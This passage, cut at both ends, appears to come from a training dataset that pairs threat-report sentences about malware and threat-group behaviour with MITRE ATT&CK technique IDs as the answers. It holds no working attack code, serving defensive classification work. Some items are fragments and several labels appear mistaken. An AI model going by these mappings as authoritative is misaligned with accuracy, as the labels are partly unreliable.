uses the radador() function to randomize the domain### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network logon scripts can be assigned using Active Directory or Group Policy Objects.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin uses regsvr32.exe to run a .sct file for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conclusion CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has encrypted and encoded data in its malware, including by using base64.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attack chain of Tropic Trooper’s operations Here’s a summary of the attack chain of Tropic Trooper’s recent campaigns: Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in Microsoft Office’s Equation Editor (EQNEDT32.EXE)### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has transferred implant files using Windows Admin Shares.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can use a hardcoded RSA key to encrypt some of its C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ServHelper has a module to delete itself from the infected machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can gather a list of processes running on the machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie uses ipconfig /all and route PRINT to identify network adapter and interface information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used encoded PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Windows, users can mark specific files as hidden by using the attrib.exe binary.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PS1 can inject its payload DLL Into memory.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mofang has also encrypted payloads before they are downloaded to victims.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exploitation of this vulnerability allows an attacker to escalate privileges on the affected system### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can discover pluggable/removable drives to extract files from.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also rename malicious DLL files with Control Panel file extensions and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These snap-ins may be used to manage Windows systems locally or remotely.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST was digitally signed by SolarWinds from March - May 2020.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack has a C2 proxy tool that masquerades as GUP.exe, which is software used by Notepad++.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can identify the user name on a compromised system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In doing so, adversaries can hide the presence of malicious components and file input/output from security tools.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a command to list processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component can perform brute force password guessing against authentication portals.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer uses a custom port scanner to map out a network.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has also executed commands remotely via cmd.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has the ability to save and execute VBScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various implementations of CHOPSTICK communicate with C2 over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has created new services or modified existing ones to run executables, commands, or scripts.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KRBTGT is the Kerberos Key Distribution Center service account and is responsible for encrypting and signing all Kerberos tickets.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI has used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperBro can run shellcode it injects into a newly created process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has the ability to capture the victim's screen.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used Cobalt Strike C2 beacons for data exfiltration.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used encryption 's Out-EncryptedScript.ps1, random variable names, and base64 encoding to obfuscate PowerShell commands and payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has created LNK files in the Startup folder to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer will attempt to clear the System and Security event logs using wevtutil.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search public WHOIS data for information about victims that can be used during targeting.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear has used DLL side loading to import and load a malicious DLL loader.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can record the hostname and kernel version of the target machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ECCENTRICBANDWAGON has stored keystrokes and screenshots within the %temp%\GoogleChrome, %temp%\Downloads, and %temp%\TrendMicroUpdate directories.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While performing the analysis on the delivery documents using the .sct file AppLocker bypass, we noticed the C# payload was functionally similar to the original RogueRobin payload### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has exfiltrated files and directories of interest from the targeted system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has used a modified version of pentesting script wmiexec.vbs to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many DGAs are time-based, generating a different domain for each time period .### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Systemd utilizes configuration files known as service units to control how services boot and under what conditions.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has altered the InstallTime subkey.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: Screen capture of the downloader executed on OS X El Capitan### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alerts for credential theft tools and privileged account lockouts should be investigated### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird performs multiple process injections to hijack system processes and execute malicious code.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack contains a function that calls LoadLibrary and GetProcAddress.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can enumerate drives and Remote Desktop sessions.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to identify folders and files related to previous infections.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type runs the command net user on a victim.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has disabled and uninstalled security tools.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management products.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has performed file deletion to evade detection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot communicated with its C2 server via HTTP GET requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may build capabilities that can be used during targeting.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seth-Locker can encrypt files on a targeted system, appending them with the suffix .seth.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Campaign Code and Compile Time Correlation In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette can identify the system name of a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET builds a malicious application bundle to resemble Safari through using the Safari icon and Info.plist.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has staged collected data in a central upload directory prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Verifies that there is no process with the name “rsyncd” on the active process list (“dbus-inotifier” if the Trojan does not have root privileges)### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Team Viewer ### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various Lazarus Group malware enumerates logged-on users.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT contains code to clear event logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,collect usernames### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has collected information via Empire, which is automatically sent the data back to the adversary's C2.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERTON has used HTTP/HTTPS for C2 traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain accounts can cover users, administrators, and services.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLACKCOFFEE has the capability to enumerate files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may include things such as firewall rules and anti-virus.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Socksbot can list all running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create a local account to maintain access to victim systems.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used legitimate executables to perform DLL side-loading of their malware.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file .### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX provides a native command, pbpaste, to grab clipboard contents.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can leverage a computer's peripheral devices or applications to capture video recordings for the purpose of gathering information.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy creates run key Registry entries pointing to a malicious executable dropped to disk.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vasport creates a backdoor by making a connection using a HTTP POST.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With direct write access to a disk, adversaries may attempt to overwrite portions of disk data.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On macOS the dscl .### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has a command to list account information on the victim’s machine.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 used publicly available malware for privilege escalation.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can check for the presence of network sniffers, AV, and BitDefender firewall.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,### Office Applications Common office and productivity applications such as Microsoft Office are also targeted through Phishing.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of the discovered config files contained a URL with an as yet unidentified md5: hxxps://46.165.222(dot)28/upgrade/bf0dac805798cc1f633f19ce8ed6382f/upgrade.php Victim set #4 A set of victims discovered installed Siemens SCADA software in their ICS environment was responsible for downloading and executing BlackEnergy### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has created services to appear as benign system tools.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok proxies web traffic to potentially monitor and alter victim HTTP traffic.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can utilize web services including Google sites to send and receive C2 data.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses module networkDll for process list discovery.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has planted Web shells on Outlook Exchange servers.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has used PowerShell for execution and privilege escalation.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has accessed and hijacked online email communications using stolen credentials.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The tokens for each platform are hardcoded within the sample:November 2016 to January 2017: ""Evil New Year"" CampaignIn the early part of 2017, Group123 started the ""Evil New Year"" campaign### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has had null characters padded in its malicious DLL payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HISTCONTROL can also be set to ignore duplicate commands by setting it to ""ignoredups"".### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has sent phishing emails containing a link to an actor-controlled Google Drive document or other free online file hosting services.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.### Assistant: T1612: Build Image on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can collect usernames from the local system via net.exe user.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon decrypts task and configuration files for execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT will attempt to detect if the victim system has a camera during the initial infection.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Glimpse panel showing three compromised systems To interact with a specific agent, the actor selects the entry to open in the agent control panel### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig can download and run batch files to execute commands on a compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu is capable of loading executable code via process hollowing.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has deleted files using the VBA kill function.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This functionality has been implemented in the MimiPenguin, an open source tool inspired by Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae has the ability to delete files and directories.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used tools to encode C2 communications including Base64 encoding.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerStallion uses Microsoft OneDrive as a C2 server via a network drive mapped with net use.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat is capable of deleting the backdoor file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In an enterprise environment, servers and workstations can be organized into domains.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has installed a bootkit on the system to maintain persistence.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has exfiltrated files stolen from local systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel uses RC4 for encrypting the configuration.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment or sandbox, specifically those that are automated or only operate for a limited amount of time.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During the T9000 installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can use the FindNextUrlCacheEntryA and FindFirstUrlCacheEntryA functions to search for specific strings within browser history.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create self-signed SSL/TLS certificates that can be used during targeting.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit has encrypted files and disks using AES-128-CBC and RSA-2048.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi injects itself into the secure shell process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda uses PowerShell to download and execute the payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Starting in Mac OS X 10.7 , users can specify certain applications to be re-opened when a user logs into their machine after reboot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can list files on available disk volumes.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CozyCar uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy 